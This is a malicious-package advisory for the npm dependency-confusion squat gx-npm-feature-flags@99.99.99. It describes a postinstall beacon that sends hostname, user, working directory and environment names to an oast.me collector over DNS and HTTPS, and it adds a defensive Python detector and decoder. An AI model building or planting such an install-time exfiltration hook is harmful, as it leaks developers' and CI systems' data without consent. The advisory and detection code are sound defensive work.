
MAL-2026-6466

Malicious code in gx-npm-feature-flags (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7fcad1b944d9ceb92389673398df9f471911a788fe608774a3298c69900bb1c7)

gx-npm-feature-flags@99.99.99 is a dependency-confusion squat (max-semver `99.99.99` on a `gx-`-prefixed name to outrank a private internal package) that runs an exfiltration beacon at install time. `package.json` declares `postinstall: node beacon.js`. beacon.js collects the installer's OS hostname (`os.hostname()`), OS user (`os.userInfo()` / `process.env.USER`), current working directory (`process.cwd()`), package name, Node version, and the first 80 environment-variable names (`process.env`), then exfiltrates via two channels to a hardcoded `*.oast.me` endpoint: (1) a DNS lookup encoding pkg/host/user as subdomain labels (`dns.lookup('<pkg>.<host>.<user>.d8uectoqtvskhftsa940pm3kth3ahdxn4.oast.me')`), and (2) an HTTPS GET to the same host with a base64-encoded JSON blob in the query string (`path: '/'+pkg+'?d='+base64(JSON({pkg,host,user,cwd,env_names,node}))`). The base64 wrapping obscures the payload from proxy logs; the dual DNS+HTTPS channels are designed to bypass egress filtering. The package README self-labels as 'authorized security research / Bugcrowd dependency-confusion PoC'. That framing does not constitute consent from any third party who installs the package: their CI/build identifiers are sent to a third-party collector regardless of the author's stated intent.
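A defender-side check for the pattern described above, as an added example (not code from the advisory or from either source): it flags a manifest that combines an install-time lifecycle hook with the max-semver version, recovers the JSON blob from a `d=` query parameter in a proxy log URL (handling the `+` that `parse_qs` turns into a space), and extracts the leading labels of a `*.oast.me` lookup. All sample inputs are constructed; the `token` label and the `build-01`/`ci` values are placeholders.

```python
import base64
import json
from typing import Optional
from urllib.parse import parse_qs, urlsplit

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")  # run on `npm install`
MAX_SEMVER = "99.99.99"  # sentinel version that outranks any real internal release


def audit_manifest(manifest: dict) -> list[str]:
    """Heuristic findings for a parsed package.json (squat version + install-time hooks)."""
    findings = []
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in INSTALL_HOOKS:
            findings.append(f"install-time hook '{hook}' runs: {cmd}")
    if manifest.get("version") == MAX_SEMVER:
        findings.append(f"version {MAX_SEMVER} (max-semver dependency-confusion pattern)")
    return findings


def decode_beacon_query(url: str) -> Optional[dict]:
    """Recover the JSON object carried as base64 in a `d=` query parameter, else None."""
    qs = parse_qs(urlsplit(url).query)
    if "d" not in qs:
        return None
    raw = qs["d"][0].replace(" ", "+")  # parse_qs decodes a literal '+' as a space
    raw += "=" * (-len(raw) % 4)  # tolerate stripped padding
    try:
        obj = json.loads(base64.b64decode(raw, validate=True))
    except ValueError:  # bad base64 (binascii.Error), non-UTF-8 bytes, or not JSON
        return None
    return obj if isinstance(obj, dict) else None


def oast_labels(hostname: str) -> Optional[list[str]]:
    """Leading labels of a lookup to <labels>.<token>.oast.me (pkg/host/user), else None."""
    labels = hostname.lower().rstrip(".").split(".")
    if len(labels) < 4 or labels[-2:] != ["oast", "me"]:
        return None
    return labels[:-3]  # drop '<token>.oast.me'


# Constructed samples modelled on the advisory's description (not real captures).
SAMPLE_MANIFEST = {"name": "gx-npm-feature-flags", "version": "99.99.99",
                   "scripts": {"postinstall": "node beacon.js"}}
_blob = {"pkg": "gx-npm-feature-flags", "host": "build-01", "user": "ci",
         "cwd": "/home/ci/app", "env_names": ["PATH", "HOME"], "node": "v20.0.0"}
SAMPLE_URL = ("https://token.oast.me/gx-npm-feature-flags?d="
              + base64.b64encode(json.dumps(_blob).encode()).decode())
SAMPLE_DNS = "gx-npm-feature-flags.build-01.ci.token.oast.me"

if __name__ == "__main__":
    print(audit_manifest(SAMPLE_MANIFEST))
    print(decode_beacon_query(SAMPLE_URL))
    print(oast_labels(SAMPLE_DNS))
```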

## Source: ossf-package-analysis (b1c95e5e4a2cb9afebf67c805d5a74c5aba0ebedd5ed011f65dc6406b6a693cd)

The OpenSSF Package Analysis project identified 'gx-npm-feature-flags' @ 99.99.99 (npm) as malicious.

It is considered malicious because:

- The package communicates with a domain associated with malicious activity.


Affected packages

npm / gx-npm-feature-flags

No fixed version published yet for gx-npm-feature-flags (npm). Pin to a known-safe version or switch to an alternative.
